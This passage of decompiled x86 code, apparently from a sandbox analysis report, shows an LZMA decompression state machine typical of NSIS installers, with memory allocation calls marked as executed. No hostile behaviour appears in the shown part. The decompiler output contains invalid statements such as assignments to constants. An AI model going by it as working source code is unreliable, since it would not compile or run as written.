                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            								L38:
                                                                                                                                                                            								__eax =  *(__ebp - 0x40);
                                                                                                                                                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										if(__ebx >= 0x100) {
                                                                                                                                                                            											break;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eax =  *(__ebp - 0x58);
                                                                                                                                                                            										__edx = __ebx + __ebx;
                                                                                                                                                                            										__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            										__esi = __edx + __eax;
                                                                                                                                                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            										__ax =  *__esi;
                                                                                                                                                                            										 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            										__edi = __ax & 0x0000ffff;
                                                                                                                                                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											__cx = __ax;
                                                                                                                                                                            											_t169 = __edx + 1; // 0x1
                                                                                                                                                                            											__ebx = _t169;
                                                                                                                                                                            											__cx = __ax >> 5;
                                                                                                                                                                            											 *__esi = __ax;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            											0x800 = 0x800 - __edi;
                                                                                                                                                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            											__ebx = __ebx + __ebx;
                                                                                                                                                                            											 *__esi = __cx;
                                                                                                                                                                            										}
                                                                                                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                                                                            											L45:
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t155 = __ebp - 0x70;
                                                                                                                                                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            									L53:
                                                                                                                                                                            									_t172 = __ebp - 0x34;
                                                                                                                                                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            									L54:
                                                                                                                                                                            									__al =  *(__ebp - 0x44);
                                                                                                                                                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            									L55:
                                                                                                                                                                            									if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            										 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            										goto L170;
                                                                                                                                                                            									}
                                                                                                                                                                            									__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            									__al =  *(__ebp - 0x5c);
                                                                                                                                                                            									__edx =  *(__ebp - 8);
                                                                                                                                                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            									 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            									__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            									__eax = __ecx + 1;
                                                                                                                                                                            									__edx = 0;
                                                                                                                                                                            									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            									__edx = _t191;
                                                                                                                                                                            									L79:
                                                                                                                                                                            									 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            									L80:
                                                                                                                                                                            									 *(__ebp - 0x88) = 2;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                            									goto L53;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L40;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								L36:
                                                                                                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            									 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            									L170:
                                                                                                                                                                            									_t568 = 0x22;
                                                                                                                                                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                                                                            									_t535 = 0;
                                                                                                                                                                            									L172:
                                                                                                                                                                            									return _t535;
                                                                                                                                                                            								}
                                                                                                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								_t121 = __ebp - 0x70;
                                                                                                                                                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								goto L38;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t534 =  *(_t614 - 0x88);
                                                                                                                                                                            					if(_t534 > 0x1c) {
                                                                                                                                                                            						L171:
                                                                                                                                                                            						_t535 = _t534 | 0xffffffff;
                                                                                                                                                                            						goto L172;
                                                                                                                                                                            					}
                                                                                                                                                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
                                                                                                                                                                            						case 0:
                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                            							_t534 =  *( *(_t614 - 0x70));
                                                                                                                                                                            							if(_t534 > 0xe1) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t538 = _t534 & 0x000000ff;
                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_pop(_t570);
                                                                                                                                                                            							_push(9);
                                                                                                                                                                            							_pop(_t571);
                                                                                                                                                                            							_t610 = _t538 / _t570;
                                                                                                                                                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                            							 *(_t614 - 0x3c) = _t605;
                                                                                                                                                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                                                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                                                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                                                                            								L10:
                                                                                                                                                                            								if(_t613 == 0) {
                                                                                                                                                                            									L12:
                                                                                                                                                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                                                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L11;
                                                                                                                                                                            								}
                                                                                                                                                                            								do {
                                                                                                                                                                            									L11:
                                                                                                                                                                            									_t613 = _t613 - 1;
                                                                                                                                                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                                                                            								} while (_t613 != 0);
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *(_t614 - 4) != 0) {
                                                                                                                                                                            								GlobalFree( *(_t614 - 4)); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            							 *(_t614 - 4) = _t534;
                                                                                                                                                                            							if(_t534 == 0) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                                                                            								goto L10;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 1:
                                                                                                                                                                            							L13:
                                                                                                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t614 - 0x88) = 1;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                            							_t45 = _t614 - 0x48;
                                                                                                                                                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                                                                            							__eflags =  *_t45;
                                                                                                                                                                            							L15:
                                                                                                                                                                            							if( *(_t614 - 0x48) < 4) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t546 =  *(_t614 - 0x40);
                                                                                                                                                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                                                                            								L20:
                                                                                                                                                                            								 *(_t614 - 0x48) = 5;
                                                                                                                                                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t614 - 0x74) = _t546;
                                                                                                                                                                            							if( *(_t614 - 8) != 0) {
                                                                                                                                                                            								GlobalFree( *(_t614 - 8)); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                                                                            							 *(_t614 - 8) = _t534;
                                                                                                                                                                            							if(_t534 == 0) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L20;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 2:
                                                                                                                                                                            							L24:
                                                                                                                                                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                                                                            							 *(_t614 - 0x84) = 6;
                                                                                                                                                                            							 *(_t614 - 0x4c) = _t553;
                                                                                                                                                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 3:
                                                                                                                                                                            							L21:
                                                                                                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t614 - 0x88) = 3;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                            							_t67 = _t614 - 0x70;
                                                                                                                                                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                            							__eflags =  *_t67;
                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L23:
                                                                                                                                                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                                                                            							if( *(_t614 - 0x48) != 0) {
                                                                                                                                                                            								goto L21;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						case 4:
                                                                                                                                                                            							goto L133;
                                                                                                                                                                            						case 5:
                                                                                                                                                                            							goto L137;
                                                                                                                                                                            						case 6:
                                                                                                                                                                            							goto L0;
                                                                                                                                                                            						case 7:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                            								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            								__eax =  *(__ebp - 0x28);
                                                                                                                                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            								__eax = 0;
                                                                                                                                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            								__al = __al & 0x000000fd;
                                                                                                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            								goto L68;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 4);
                                                                                                                                                                            							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            							 *(__ebp - 0x84) = 8;
                                                                                                                                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 8:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                                                                                                            								__ecx =  *(__ebp - 4);
                                                                                                                                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            								 *(__ebp - 0x84) = 9;
                                                                                                                                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 9:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								goto L89;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            							if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            								goto L171;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            							__eflags = _t258;
                                                                                                                                                                            							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                            							goto L75;
                                                                                                                                                                            						case 0xa:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x28);
                                                                                                                                                                            							goto L88;
                                                                                                                                                                            						case 0xb:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            							L88:
                                                                                                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            							L89:
                                                                                                                                                                            							__eax =  *(__ebp - 4);
                                                                                                                                                                            							 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            							goto L68;
                                                                                                                                                                            						case 0xc:
                                                                                                                                                                            							L99:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t334 = __ebp - 0x70;
                                                                                                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t334;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            							goto L101;
                                                                                                                                                                            						case 0xd:
                                                                                                                                                                            							goto L36;
                                                                                                                                                                            						case 0xe:
                                                                                                                                                                            							goto L45;
                                                                                                                                                                            						case 0xf:
                                                                                                                                                                            							goto L57;
                                                                                                                                                                            						case 0x10:
                                                                                                                                                                            							L109:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t365 = __ebp - 0x70;
                                                                                                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t365;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							goto L111;
                                                                                                                                                                            						case 0x11:
                                                                                                                                                                            							L68:
                                                                                                                                                                            							__esi =  *(__ebp - 0x58);
                                                                                                                                                                            							 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                            							goto L132;
                                                                                                                                                                            						case 0x12:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            							goto L130;
                                                                                                                                                                            						case 0x13:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								_t469 = __ebp - 0x58;
                                                                                                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            								__eflags =  *_t469;
                                                                                                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                                                                                                            								L144:
                                                                                                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            								goto L145;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            							L130:
                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                                                                                                            							goto L144;
                                                                                                                                                                            						case 0x14:
                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                                                                                                            							goto L140;
                                                                                                                                                                            						case 0x15:
                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							goto L120;
                                                                                                                                                                            						case 0x16:
                                                                                                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                            								_push(3);
                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 4);
                                                                                                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            							goto L145;
                                                                                                                                                                            						case 0x17:
                                                                                                                                                                            							L145:
                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            							goto L149;
                                                                                                                                                                            						case 0x18:
                                                                                                                                                                            							L146:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t484 = __ebp - 0x70;
                                                                                                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t484;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L148:
                                                                                                                                                                            							_t487 = __ebp - 0x48;
                                                                                                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            							__eflags =  *_t487;
                                                                                                                                                                            							L149:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            								0 = 1;
                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            								goto L140;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            								 *(__ebp - 0x50) = __edx;
